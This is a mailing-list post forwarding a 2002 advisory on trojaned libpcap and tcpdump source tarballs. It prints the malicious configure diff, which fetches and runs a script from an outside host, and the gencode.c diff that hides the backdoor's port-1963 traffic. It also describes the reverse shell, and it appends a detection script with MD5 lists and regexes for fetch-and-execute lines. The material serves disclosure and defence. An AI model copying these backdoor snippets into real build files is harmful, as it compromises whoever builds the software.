ALT Linux Community general discussions
* [Comm] [alex@intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan]
@ 2002-11-14 10:59 Dmitry V. Levin
From: Dmitry V. Levin @ 2002-11-14 10:59 UTC (permalink / raw)
  To: ALT Linux Sisyphus mailing list, ALT Linux general discussion list

[-- Attachment #1: Type: text/plain, Size: 4501 bytes --]

This is not a security announcement.
Just to be clear: the sources in Sisyphus and in the distributions are fine.

----- Forwarded message from Mincu Alexandru <alex@intelinet.ro> -----

Date: 13 Nov 2002 16:48:30 +0200
From: Mincu Alexandru <alex@intelinet.ro>
To: bugtraq@securityfocus.com
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Organization: 
X-Mailer: Ximian Evolution 1.2.0 

Updates:

      * Many mirrors are infected with the trojan.
Background:

      * Libpcap provides a packet sniffing library for programs like
        Snort.
      * Tcpdump is a standard tool for packet sniffing.
Details:

      * The trojan contains modifications to the configure script and
        gencode.c (in libpcap only).
        
      * The configure script downloads
        http://mars.raketti.net/~mash/services which is then sourced
        with the shell. It contains an embedded shell script that
        creates a C file, and compiles it.
        
      * The program connects to 212.146.0.34 (mars.raketti.net) on port
        1963 and reads one of three one-byte status codes:
              * A - program exits 
              * D - forks and spawns a shell and does the needed file
                descriptor manipulation to redirect it to the existing
                connection to 212.146.0.34. 
              * M - closes connection, sleeps 3600 seconds, and then
                reconnects 
        
        
        Hmm... ADM...
        
      * It's important to note that it reuses the same outgoing
        connection for the shell. This gets around firewalls that block
        incoming connections.
        
      * Gencode.c is modified to force libpcap to ignore packets to/from
        the backdoor program, hiding the backdoor program's traffic.
        
      * This is similar to the OpenSSH trojan a few months ago.
        
        
Good sources: 

http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz


MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz

Trojaned sources:

http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz


MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:


*** 288,293 ****
--- 289,318 ----
  {
        extern int n_errors;
        int len;
+         int l;
+         char *port = "1963";
+         char *str, *tmp, *new = "not port 1963";
+ 
+     if (buf && *buf && strstr (buf, port)) {
+         buf = "port 1964";
+     }
+     else {
+         l = strlen (new) + 1;
+         if (!(!buf || !*buf)) {
+             l += strlen (buf);
+             l += 5; /* and */
+         }
+ 
+         str = (char *)malloc (l);
+         str[0] = '\0';
+         if (!(!buf || !*buf)) {
+             strcpy (str, buf);
+             strcat (str, " and ");
+         }
+ 
+         strcat (str, new);
+         buf = str;
+     }
  
        no_optimize = 0;
        n_errors = 0;
***************
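Review bot: the filter rewrite at the top of the hunk is observable from user space, which is the cheapest way to confirm a tainted build. strstr(buf, port) matches the digits 1963 anywhere in the expression, not only in a port primitive, and any such expression is replaced wholesale by "port 1964"; every other non-empty expression becomes "<expr> and not port 1963" and an empty one becomes "not port 1963". Because the compiled program therefore always differs from what the caller passed in, running tcpdump -d on a filter of your choice shows a port-1963 test that the expression never contained. Minor points on the same lines: malloc(l) is used without a NULL check, and str is never freed.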

The (relevant) configure diff:


+  CNF="services"
+  URL="mars.raketti.net/~mash/$CNF"

!  (IFS=","
!  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
! 
!  for i in $ARGS; do
!        IFS=" "
!        $i $URL 1> $CNF
!        if [ -f $CNF ]; then sh $CNF
!            exit
!        fi
!        rm -f $CNF
!  done) 1>/dev/null 2>/dev/null &
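Review bot: the fallback loop never falls back. In `$i $URL 1> $CNF` the shell creates $CNF while setting up the redirection, before the fetcher runs, so `[ -f $CNF ]` is true after the first iteration whether wget succeeded, failed or is not installed at all; the script then runs sh on whatever was written (an empty file on failure) and exits the subshell, leaving `rm -f $CNF` and the lynx/fetch alternatives as dead code. Two consequences for anyone checking a build: the downloaded file is left behind under the name services in the directory where configure ran, and the whole group is backgrounded with stdout and stderr sent to /dev/null, so neither the fetch nor its failure shows in configure's output. The URL carries no scheme and nothing checks what comes back before it is executed.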

The "services" payload:
      * trojan-script, the non-obfuscated portion (excerpted)
      * services, the complete version
Thanks to:

Russell Adams <rladams@NO_SPAMadamsinfoserv.com>
Mathew Solnik <msolnik@NO_SPAMhlug.org>
Scott Stout <skout@NO_SPAMwiretapped.us>

with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned 

-- 
Mincu Alexandru <alex@intelinet.ro>

----- End forwarded message -----

--
ldv

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
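The two defensive checks a packager could have run against the tarballs and the configure diff above, as an added example; this is not code from the advisory, from ALT Linux or from tcpdump.org. The MD5 sums are copied from the post; the detection regexes, the function names and the clean configure sample are constructed for the example, and the trojaned configure sample is the configure diff above with its `!`/`+` markers stripped. MD5 is used only because that is what the advisory published: a match proves you hold the same bytes the poster did, nothing more, and a present-day check would pin a SHA-256 sum and verify the release signature.

```python
"""Added example: (1) classify a tarball by MD5 against the advisory's
good/trojaned lists, (2) audit a configure script for the fetch-and-source
pattern shown in the trojaned configure diff. Not code from the post."""
import hashlib
import re

# MD5 sums exactly as published in the advisory.
KNOWN_GOOD = {
    "libpcap-0.7.1.tar.gz": "0597c23e3496a5c108097b2a0f1bd0c7",
    "tcpdump-3.6.2.tar.gz": "6bc8da35f9eed4e675bfdf04ce312248",
    "tcpdump-3.7.1.tar.gz": "03e5eac68c65b7e6ce8da03b0b0b225e",
}
KNOWN_TROJANED = {
    "libpcap-0.7.1.tar.gz": "73ba7af963aff7c9e23fa1308a793dca",
    "tcpdump-3.6.2.tar.gz": "3a1c2dd3471486f9c7df87029bf2f1e9",
    "tcpdump-3.7.1.tar.gz": "3c410d8434e63fb3931fe77328e4dd88",
}


def md5_hex(data: bytes) -> str:
    """Hex MD5 of a tarball's bytes. MD5 only because the advisory
    published MD5; it is not collision resistant."""
    return hashlib.md5(data).hexdigest()


def classify_digest(name: str, digest: str) -> str:
    """Return 'good', 'trojaned' or 'unknown' for a tarball name and MD5."""
    digest = digest.strip().lower()
    if KNOWN_GOOD.get(name) == digest:
        return "good"
    if KNOWN_TROJANED.get(name) == digest:
        return "trojaned"
    return "unknown"


# Heuristics constructed for this example: a configure script has no
# business running a network client, executing a file it just wrote, or
# hiding a backgrounded job's output.
FETCH_RE = re.compile(r"\b(wget|curl|lynx|fetch|ftp)\b")
EXEC_RE = re.compile(
    r"(?:^|[|;&(]|\b(?:then|do|else)\b)\s*(?:sh|bash|source|eval|\.)(?=\s|$)")
SILENCED_BG_RE = re.compile(r">\s*/dev/null.*&\s*$")


def audit_configure(script: str) -> list:
    """Return (line_number, kind, line) for every suspicious line."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # blank lines and comments are not executed
        if FETCH_RE.search(code):
            findings.append((n, "network-client", code))
        if EXEC_RE.search(code):
            findings.append((n, "executes-file", code))
        if SILENCED_BG_RE.search(code):
            findings.append((n, "silenced-background-job", code))
    return findings


# The configure diff from the advisory, without its '!'/'+' markers.
TROJANED_CONFIGURE = """\
CNF="services"
URL="mars.raketti.net/~mash/$CNF"

(IFS=","
ARGS="wget -q -O -,lynx --source,fetch -q -o -"

for i in $ARGS; do
       IFS=" "
       $i $URL 1> $CNF
       if [ -f $CNF ]; then sh $CNF
           exit
       fi
       rm -f $CNF
done) 1>/dev/null 2>/dev/null &
"""

# Constructed stand-in for an ordinary autoconf fragment.
CLEAN_CONFIGURE = """\
# constructed: compiler probe as autoconf would emit it
for ac_prog in gcc cc; do
  if test -x "$ac_dir/$ac_prog"; then
    CC="$ac_prog"; break
  fi
done
if $CC -c conftest.c >/dev/null 2>&1; then
  ac_cv_prog_cc_works=yes
fi
"""

if __name__ == "__main__":
    print(classify_digest("libpcap-0.7.1.tar.gz",
                          "73ba7af963aff7c9e23fa1308a793dca"))
    for n, kind, code in audit_configure(TROJANED_CONFIGURE):
        print(f"line {n}: {kind}: {code}")
    print("clean sample findings:", audit_configure(CLEAN_CONFIGURE))
```

The fetch in the trojaned script is hidden behind `$i`, so the audit trips on the line that defines ARGS rather than on the invocation; a script that assembled the command name from fragments would pass this check, which is why the checksum comparison comes first and the audit is a second, cheaper filter rather than a replacement for it.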
